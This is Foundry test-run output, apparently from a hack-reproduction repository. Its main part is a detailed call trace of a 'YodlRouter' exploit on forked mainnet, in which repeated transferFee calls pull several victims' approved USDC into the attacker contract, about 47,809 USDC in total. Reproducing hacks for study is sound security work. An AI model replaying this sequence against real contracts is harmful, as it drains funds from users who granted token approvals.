Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-08/YodlRouter_exp.sol:29:5:
   |
29 |     address internal USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 472.54ms (2.06ms CPU time)

Ran 1 test for src/test/2024-08/YodlRouter_exp.sol:NoName
[PASS] testExploit() (gas: 143696)
Logs:
  Attacker USDC Balance Before exploit: 0.000000
  Attacker USDC Balance After exploit: 47809.355551

Traces:
  [12875] NoName::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20520368 [2.052e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [162896] NoName::testExploit()
    ├─ [10370] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::symbol() [staticcall]
    │   ├─ [3081] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [3164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [2381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance Before exploit", val: 0, decimals: 6)
    ├─ [42238] 0xE3A0bc3483AE5a04DB7eF2954315133a6F7D228E::transferFee(45588747326 [4.558e10], 10000 [1e4], 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [40049] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 45588747326 [4.558e10])
    │   │   ├─ [39254] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 45588747326 [4.558e10]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0, to: NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 45588747326 [4.558e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000000a9d4d143e
    │   │   │   │   @ 0xd7038cbe8a22ffed2f56284a804e05c54b0d95e76907a8c17a63bc2ed91df049: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffff6282c50ff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffeb8adf3cc1
    │   │   │   │   @ 0xc59e46ef74084c3886ddf4566bfd45c99ac0ac8f331fd3843ce2299229e15aab: 0x0000000000000000000000000000000000000000000000000000000a9d4d143e → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000a9d4d143e
    ├─ [18338] 0xE3A0bc3483AE5a04DB7eF2954315133a6F7D228E::transferFee(1219608225 [1.219e9], 10000 [1e4], 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xa7b7d4ebF1F5035F3b289139baDa62f981f2916E, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [16149] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0xa7b7d4ebF1F5035F3b289139baDa62f981f2916E, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1219608225 [1.219e9])
    │   │   ├─ [15354] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0xa7b7d4ebF1F5035F3b289139baDa62f981f2916E, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1219608225 [1.219e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xa7b7d4ebF1F5035F3b289139baDa62f981f2916E, to: NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1219608225 [1.219e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000000a9d4d143e → 0x0000000000000000000000000000000000000000000000000000000ae5fed2df
    │   │   │   │   @ 0x0d9afa955d9b153d210657a61ead78f2668188f8014b4a655baffa047a528e86: 0x00000000000000000000000000000000000000000000000000000001e9ed44a1 → 0x00000000000000000000000000000000000000000000000000000001a13b8600
    │   │   │   │   @ 0x3f4d3a7e220adb7663eb3026d6bb7eeeba63f879cc8cad814dc32a8a9f4d629a: 0x0000000000000000000000000000000000000000000000000000000048b1bea1 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000048b1bea1
    ├─ [18338] 0xE3A0bc3483AE5a04DB7eF2954315133a6F7D228E::transferFee(1000000000 [1e9], 10000 [1e4], 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x2c349022df145C1a2eD895B5577905e6F1Bc7881, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [16149] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0x2c349022df145C1a2eD895B5577905e6F1Bc7881, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000 [1e9])
    │   │   ├─ [15354] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0x2c349022df145C1a2eD895B5577905e6F1Bc7881, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000 [1e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x2c349022df145C1a2eD895B5577905e6F1Bc7881, to: NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000000 [1e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3f1a821c4dc73d45e2aa0ae922e4001fa8e9f3c48eadef40364010ffc44b68f7: 0x0000000000000000000000000000000000000000000000000000001c633c4b8b → 0x0000000000000000000000000000000000000000000000000000001c27a1818b
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000000ae5fed2df → 0x0000000000000000000000000000000000000000000000000000000b21999cdf
    │   │   │   │   @ 0x28bb5a2388b145d5569471c32a04ce722888420e262e528b83d869f7de11b5cd: 0x000000000000000000000000000000000000000000000000000000003b9aca00 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000003b9aca00
    ├─ [18338] 0xE3A0bc3483AE5a04DB7eF2954315133a6F7D228E::transferFee(1000000 [1e6], 10000 [1e4], 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x96D0F726FD900E199680277aAaD326fbdebc6BF9, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [16149] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0x96D0F726FD900E199680277aAaD326fbdebc6BF9, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000 [1e6])
    │   │   ├─ [15354] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0x96D0F726FD900E199680277aAaD326fbdebc6BF9, NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000 [1e6]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x96D0F726FD900E199680277aAaD326fbdebc6BF9, to: NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000 [1e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x271a6e04518a0f7a59a3c941e0ddcb1c38ce414b8dbb2074571d3347b9cab187: 0x0000000000000000000000000000000000000000000000000000000006720d73 → 0x000000000000000000000000000000000000000000000000000000000662cb33
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000000b21999cdf → 0x0000000000000000000000000000000000000000000000000000000b21a8df1f
    │   │   │   │   @ 0xb94cab8b4049f0cc32793d2df2f59902d81121013f466ee75bb0e1045d28fc46: 0x00000000000000000000000000000000000000000000000000000000000f4240 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000f4240
    ├─ [1870] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::symbol() [staticcall]
    │   ├─ [1081] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::symbol() [delegatecall]
    │   │   └─ ← [Return] "USDC"
    │   └─ ← [Return] "USDC"
    ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(NoName: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 47809355551 [4.78e10]
    │   └─ ← [Return] 47809355551 [4.78e10]
    ├─ [1164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC Balance After exploit", val: 47809355551 [4.78e10], decimals: 6)
    ├─  storage changes:
    │   @ 0xd7038cbe8a22ffed2f56284a804e05c54b0d95e76907a8c17a63bc2ed91df049: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffff6282c50ff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffeb8adf3cc1
    │   @ 0x28bb5a2388b145d5569471c32a04ce722888420e262e528b83d869f7de11b5cd: 0x000000000000000000000000000000000000000000000000000000003b9aca00 → 0
    │   @ 0xb94cab8b4049f0cc32793d2df2f59902d81121013f466ee75bb0e1045d28fc46: 0x00000000000000000000000000000000000000000000000000000000000f4240 → 0
    │   @ 0x3f4d3a7e220adb7663eb3026d6bb7eeeba63f879cc8cad814dc32a8a9f4d629a: 0x0000000000000000000000000000000000000000000000000000000048b1bea1 → 0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.32s (4.13s CPU time)

Ran 2 test suites in 5.33s (5.79s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
